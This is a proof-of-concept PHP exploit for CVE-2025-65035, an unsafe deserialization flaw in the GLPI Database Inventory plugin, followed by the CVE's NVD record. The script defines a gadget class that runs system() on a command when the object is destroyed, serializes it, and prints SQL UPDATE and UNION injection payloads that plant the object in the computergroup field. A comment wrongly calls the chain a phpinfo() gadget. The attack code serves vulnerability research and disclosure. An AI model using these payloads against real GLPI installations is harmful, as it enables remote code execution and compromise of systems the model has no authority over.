CVE-2025-65035

<?php // CVE-2025-65035 PoC - pluginsGLPI Database Inventory Plugin Unsafe Deserialization // This PoC demonstrates PHP Object Injection via computergroup field // Prerequisites: Database write access (e.g., via SQL injection or misconfiguration) // Malicious serialized payload for PHP Object Injection // Using a simple example with phpinfo() gadget chain class DatabaseInventoryGadget { private $command; public function __construct($cmd) { $this->command = $cmd; } public function __destruct() { // This will be executed when the object is destroyed system($this->command); } } // Generate malicious payload $malicious_obj = new DatabaseInventoryGadget('whoami'); $payload = serialize($malicious_obj); echo "Malicious Payload for computergroup field:\n"; echo $payload . "\n\n"; // SQL Injection payload to inject into computergroup // Assuming the attacker has identified a SQL injection point $sql_payload = "'" . addslashes($payload) . "'"; echo "SQL Injection Payload:\n"; echo "UPDATE glpi_plugin_databaseinventory_computergroup SET computergroup='" . $sql_payload . "' WHERE id=1;\n"; // Alternative: If direct SQL injection is possible // UNION-based injection example $union_payload = "' UNION SELECT '" . addslashes($payload) . "',2,3,4-- -"; echo "\nUNION Injection Payload:\n"; echo $union_payload . "\n"; // Note: This PoC requires: // 1. Database write access (SQL injection, weak credentials, or another vulnerability) // 2. A suitable PHP gadget chain in the application's class autoload // 3. The vulnerable unserialization call in the plugin code ?>

{"cve": {"id": "CVE-2025-65035", "sourceIdentifier": "[email protected]", "published": "2025-12-19T17:15:53.090", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "pluginsGLPI's Database Inventory Plugin \"manages\" the Teclib' inventory agents in order to perform an inventory of the databases present on the workstation. Prior to version 1.1.2, in certain conditions (database write access must first be obtained through another vulnerability or misconfiguration), user-controlled data is stored insecurely in the database via computergroup, and is later unserialized on every page load, allowing arbitrary PHP object instantiation. Version 1.1.2 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://github.com/pluginsGLPI/databaseinventory/blob/1.1.2/CHANGELOG.md#112---2025-11-25", "source": "[email protected]"}, {"url": "https://github.com/pluginsGLPI/databaseinventory/commit/08c7055d2c5fc744cb092d7d56a608e359c56f1a", "source": "[email protected]"}, {"url": "https://github.com/pluginsGLPI/databaseinventory/security/advisories/GHSA-xc3r-32rx-3j4j", "source": "[email protected]"}]}}